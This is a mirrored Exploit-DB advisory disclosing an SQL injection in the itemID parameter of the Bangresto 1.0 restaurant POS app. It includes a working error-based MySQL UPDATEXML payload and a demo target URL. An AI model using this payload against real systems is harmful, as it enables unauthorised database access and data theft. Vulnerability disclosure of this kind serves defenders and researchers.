Bangresto 1.0 – SQL Injection

  • 作者: nu11secur1ty
    日期: 2023-03-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51175/
  • ## Exploit Title: Bangresto 1.0 - SQL Injection
    ## Exploit Author: nu11secur1ty
    ## Date: 12.16.2022
    ## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
    ## Demo: https://axcora.my.id/bangrestoapp/start.php
    ## Software: https://github.com/mesinkasir/bangresto
    ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto
    
    ## Description:
    The `itemID` parameter appears to be vulnerable to SQL injection attacks.
    The payload ' was submitted in the itemID parameter, and a database
    error message was returned.
    The attacker can be stooling all information from the database of this
    application.
    
    ## STATUS: CRITICAL Vulnerability
    
    [+] Payload:
    
    ```MySQL
    ---
    Parameter: itemID (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
    (ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
    ---
    ```
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)
    
    ## Proof and Exploit:
    [href](https://streamable.com/moapnd)
    
    ## Time spent
    `00:30:00`
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at
    https://packetstormsecurity.com/https://cve.mitre.org/index.html and
    https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html and https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>